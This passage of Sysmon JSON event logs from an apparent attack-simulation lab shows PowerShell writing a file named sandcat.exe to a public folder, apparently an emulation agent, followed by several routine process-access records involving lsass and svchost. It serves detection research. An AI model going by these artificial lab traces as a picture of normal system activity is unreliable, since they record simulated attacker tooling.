05:46:33.672","ProcessGuid":"{A837DB8D-01B5-5F25-0000-00103D410100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\sandcat.exe","CreationUtcTime":"2020-08-01 05:46:33.672","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.313\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.313","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 